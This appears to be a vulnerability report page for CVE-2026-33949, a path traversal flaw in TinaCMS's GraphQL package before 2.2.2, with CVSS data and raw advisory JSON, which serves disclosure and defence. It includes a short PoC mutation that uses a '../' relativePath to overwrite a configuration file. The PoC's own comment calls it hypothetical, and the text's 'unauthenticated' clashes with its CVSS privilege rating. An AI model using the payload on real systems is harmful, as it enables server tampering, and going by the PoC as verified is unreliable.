Security Vulnerability Report
CVE-2026-33949 CVSS 8.1 HIGH

CVE-2026-33949

Published: 2026-04-01 17:28:40
Last Modified: 2026-04-07 19:17:36

Description

Tina is a headless content management system. Prior to version 2.2.2, a path traversal vulnerability in @tinacms/graphql allows unauthenticated users to write and overwrite arbitrary files within the project root. This is achieved by manipulating the relativePath parameter in GraphQL mutations. The impact includes the ability to replace critical server configuration files and potentially execute arbitrary commands by sabotaging build scripts. This issue has been patched in version 2.2.2.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ssw:tinacms\/graphql:*:*:*:*:*:node.js:*:* - VULNERABLE
TinaCMS < 2.2.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```graphql
# PoC for CVE-2026-33949: Path Traversal in TinaCMS GraphQL
# This mutation attempts to overwrite a configuration file using path traversal
mutation {
  # Hypothetical mutation based on the vulnerability description
  addOrUpdateDocument(
    relativePath: "../../../config/production.json"
    content: "{\"malicious\": \"payload\"}"
  ) {
    success
    document {
      id
    }
  }
}
```

References

https://github.com/tinacms/tinacms/security/advisories/GHSA-v9p7-gf3q-h779 (Vendor Advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-33949",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-01T17:28:39.507",
    "lastModified": "2026-04-07T19:17:35.867",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Tina is a headless content management system. Prior to version 2.2.2, a path traversal vulnerability in @tinacms/graphql allows unauthenticated users to write and overwrite arbitrary files within the project root. This is achieved by manipulating the relativePath parameter in GraphQL mutations. The impact includes the ability to replace critical server configuration files and potentially execute arbitrary commands by sabotaging build script. This issue has been patched in version 2.2.2."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          { "lang": "en", "value": "CWE-22" },
          { "lang": "en", "value": "CWE-73" }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:ssw:tinacms\\/graphql:*:*:*:*:*:node.js:*:*",
                "versionEndIncluding": "2.2.1",
                "matchCriteriaId": "C7C5E716-5EA4-499D-B5C0-864632E2620D"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/tinacms/tinacms/security/advisories/GHSA-v9p7-gf3q-h779",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}
```